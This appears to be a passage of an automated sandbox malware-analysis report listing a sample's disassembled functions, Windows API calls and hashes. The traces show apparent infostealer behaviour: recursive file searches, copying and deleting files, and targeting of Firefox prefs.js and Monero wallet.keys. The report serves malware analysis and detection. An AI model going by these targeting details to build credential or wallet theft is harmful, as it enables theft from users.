                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                              • Instruction ID: 91902ecfac88d648823cf530de2a2355e00c3cc8281de47cf274bb32c6cd512b
                              • Opcode Fuzzy Hash: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                              • Instruction Fuzzy Hash: FAB14871900118ABDB24FF64DC96FEE7379AF64300F8085A8E54A97151EF316B4ACF92
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0014510C,?,?,?,001451B4,?,?,00000000,?,00000000), ref: 00121923
                              • StrCmpCA.SHLWAPI(?,0014525C), ref: 00121973
                              • StrCmpCA.SHLWAPI(?,00145304), ref: 00121989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00121D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00121DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00121E20
                              • FindClose.KERNEL32(000000FF), ref: 00121E32
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                              • Instruction ID: 2f0e767cc9f86c84e1b222a25e97250bd4517097d7dad12500ab88bb0089b571
                              • Opcode Fuzzy Hash: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                              • Instruction Fuzzy Hash: 27121071950118ABDB19FB60DC96EEE7378AF74301F8141E9B14A62091EF706F89CFA1
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00140C2E), ref: 0012DE5E
                              • StrCmpCA.SHLWAPI(?,001414C8), ref: 0012DEAE
                              • StrCmpCA.SHLWAPI(?,001414CC), ref: 0012DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0012E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                              • Instruction ID: b32ca8458387420d4cc31cc530dfa228a954b56b575e4219828453951cda403f
                              • Opcode Fuzzy Hash: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                              • Instruction Fuzzy Hash: 2AF1AF71854118AADB15FB60DCA5EEE7378BF24301FC141D9B54A62091EF706F8ACF62
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001414B0,00140C2A), ref: 0012DAEB
                              • StrCmpCA.SHLWAPI(?,001414B4), ref: 0012DB33
                              • StrCmpCA.SHLWAPI(?,001414B8), ref: 0012DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0012DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                              • Instruction ID: 8992821018a3c80e0ae30d42c94bca7545e70e0d308c11058202c5ab4baf2c5d
                              • Opcode Fuzzy Hash: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                              • Instruction Fuzzy Hash: A0916972900114A7DB14FBB0FC96DED737DAFA4300F808558F94A96181EF349B59CB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2;}k$8wm$:4GM$Bk$E`uy$T&$u\t$h9$kM
                              • API String ID: 0-1077557972
                              • Opcode ID: 0db9be9c4fbd18b59efea8cdf83bed6a346733f211107972c52a0133559e3463
                              • Instruction ID: cd7b0a8ac3646f9105373f0a967b44d5f91238c8cbfabea1d39ee80aa88f9fcf
                              • Opcode Fuzzy Hash: 0db9be9c4fbd18b59efea8cdf83bed6a346733f211107972c52a0133559e3463
                              • Instruction Fuzzy Hash: 54B22AF3A0C6049FE304AE2DEC8567AFBD9EFD4620F1A853DE6C4C7744E93598058692
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +M{$:uJ~$L@$W_}$s3FT$vYz$}m?r$T-[$rI
                              • API String ID: 0-2702800542
                              • Opcode ID: aaeea504ebabc7c362fac79c0566d844f90eba262babd118dda339e907ca4c29
                              • Instruction ID: 71fe0850dc0dd09582b31843ae4089e6d0e4ad29473a42c7bbdb62e56108772f
                              • Opcode Fuzzy Hash: aaeea504ebabc7c362fac79c0566d844f90eba262babd118dda339e907ca4c29
                              • Instruction Fuzzy Hash: C7A2E8F360C204AFE3046E2DEC8567ABBEAEFD4720F16853DE6C487744EA3558058697
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001405AF), ref: 00137BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00137BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00137C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00137C62
                              • LocalFree.KERNEL32(00000000), ref: 00137D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                              • Instruction ID: 8a8bd31369dcb315163156ae4481430a9d1446727e92e3d38b109a533303df1f
                              • Opcode Fuzzy Hash: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                              • Instruction Fuzzy Hash: 5B415CB1940218ABDB24DB94DC99BEEB7B8FF58700F6041D9E10972291DB742F85CFA1
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00140D73), ref: 0012E4A2
                              • StrCmpCA.SHLWAPI(?,001414F8), ref: 0012E4F2
                              • StrCmpCA.SHLWAPI(?,001414FC), ref: 0012E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                              • Instruction ID: 943155b9e8a84cf15600d4df7871d17542093e3f6dd393d9d3d8fa5e459b70d1
                              • Opcode Fuzzy Hash: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                              • Instruction Fuzzy Hash: 8A122272910118AADB15FB70DCA6EED7378AF64300FC045E9B54AA6191EF306F49CF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'Ho$1=W7$2d$3"'O$^N5n$o,uR
                              • API String ID: 0-3401262283
                              • Opcode ID: 107facfd829c9180bfef4878f938ae53567e6e10da7b36b870583174a72fcbda
                              • Instruction ID: 6f09c1f025ff4ba0c4b853605a7d5e5c5237512f5a2286950213b5b73575b10c
                              • Opcode Fuzzy Hash: 107facfd829c9180bfef4878f938ae53567e6e10da7b36b870583174a72fcbda
                              • Instruction Fuzzy Hash: 80B2D4F360C2009FE704AF2DEC8567AB7E9EF94720F1A893DE6C5C3744E63598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Z~v$V/|$Z*3z$jyW$nT^9
                              • API String ID: 0-1874167061
                              • Opcode ID: dcb68819b23002266927988dc60dfdb3bd96d5fec3fa05c89254bef0f783bc5e
                              • Instruction ID: 1496f3b8e89a8b631113564522097c0f9e38924eecd6708516126045536d4bef
                              • Opcode Fuzzy Hash: dcb68819b23002266927988dc60dfdb3bd96d5fec3fa05c89254bef0f783bc5e
                              • Instruction Fuzzy Hash: A5B219F360C6049FE304AE2DDC8567AFBE9EF94720F1A4A3DE6C5C3744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <#~g$Nb_$u3}u$vv0w$.P}
                              • API String ID: 0-1477629152
                              • Opcode ID: 61b3660f61f7e002a64b750015306ea95c0bd4a3d1b551aa7c0356aaf901ebdc
                              • Instruction ID: 70810f1f922a4cd30a5e6c696fe0374802c6be2f11c721e68a0f34de7c1cc4cc
                              • Opcode Fuzzy Hash: 61b3660f61f7e002a64b750015306ea95c0bd4a3d1b551aa7c0356aaf901ebdc
                              • Instruction Fuzzy Hash: 3BB2F5F390C6009FE304AE2DEC8567ABBE9EF94320F1A893DE6C4C7744E63558058697
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                              • lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                              • lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                              • lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 3fc7ecaff79c10b07ea69e1388d288a82c64fda2a12f4327755752ad023208ab
                              • Instruction ID: a45d5b4e1bf4753ec3a9149e804832717c0d4d60f24d2d3ed60ccdc5bd0e2d7f
